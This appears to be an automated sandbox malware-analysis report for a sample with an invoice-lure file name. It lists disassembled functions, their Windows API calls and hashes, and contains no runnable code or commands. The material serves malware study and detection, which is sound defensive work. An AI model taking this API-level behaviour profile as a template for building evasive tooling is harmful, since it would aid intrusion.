Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55

Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$LongWindow$InvalidateRect
String ID:
API String ID: 1976402638-0
Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729

Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00442597

Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3

GetDesktopWindow.USER32 ref: 004425BF
GetWindowRect.USER32(00000000), ref: 004425C6
mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5

Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287

GetCursorPos.USER32(?), ref: 00442624
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6

Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
EnableWindow.USER32(004A83D8,00000001), ref: 00448C58

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$Enable$Show$MessageSend
String ID:
API String ID: 1871949834-0
Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A

Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044961A
SendMessageW.USER32 ref: 0044964A

Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC

SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
_wcslen.LIBCMT ref: 004496BA
_wcslen.LIBCMT ref: 004496C7
SendMessageW.USER32(?,00001074,?,?), ref: 004496FD

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$_wcslen$_memset_wcspbrk
String ID:
API String ID: 1624073603-0
Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6

Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769

Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: DestroyWindow$DeleteObject$IconMove
String ID:
API String ID: 1640429340-0
Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69

Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 00467E7C
__setmode.LIBCMT ref: 00467E85
_fprintf.LIBCMT ref: 00467EDE
OutputDebugStringW.KERNEL32(00000000,?), ref: 00467EF6
__fileno.LIBCMT ref: 00467F1D
__setmode.LIBCMT ref: 00467F26

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __fileno__setmode$DebugOutputString_fprintf
String ID:
API String ID: 3354276064-0
Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF

Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON

Download Yara Rule

APIs

DestroyMenu.USER32(?), ref: 004550EC
DestroyMenu.USER32(?), ref: 00455102
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Destroy$DeleteMenuObject$IconWindow
String ID:
API String ID: 752480666-0
Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59

Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0045527A
ImageList_Destroy.COMCTL32(?), ref: 0045528C
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Destroy$DeleteObjectWindow$IconImageList_
String ID:
API String ID: 3275902921-0
Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68

Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25

Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0041418F
__calloc_crt.LIBCMT ref: 0041419B
__getptd.LIBCMT ref: 004141A8
CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
__dosmaperr.LIBCMT ref: 00414201

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
String ID:
API String ID: 1803633139-0
Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68

Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON

Download Yara Rule

APIs

ImageList_Destroy.COMCTL32(?), ref: 004555E8
DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Destroy$DeleteObjectWindow$IconImageList_
String ID:
API String ID: 3275902921-0
Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59

Function 004554C0 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 004554DF
SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: DeleteDestroyMessageObjectSend$IconWindow
String ID:
API String ID: 3691411573-0
Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68

Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004360B5
_wcslen.LIBCMT ref: 004360CE
_wcstok.LIBCMT ref: 004360E0
_wcslen.LIBCMT ref: 004360F0
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 004360FF
_wcstok.LIBCMT ref: 00436114

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcslen$_wcstok$ExtentPoint32Text
String ID:
API String ID: 1814673581-0
Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA

Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96

Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC

MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
LineTo.GDI32(?,?,?), ref: 00447227
MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
LineTo.GDI32(?,?,?), ref: 0044723D
EndPath.GDI32(?), ref: 0044724E
StrokePath.GDI32(?), ref: 0044725C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
String ID:
API String ID: 372113273-0
Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD

Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
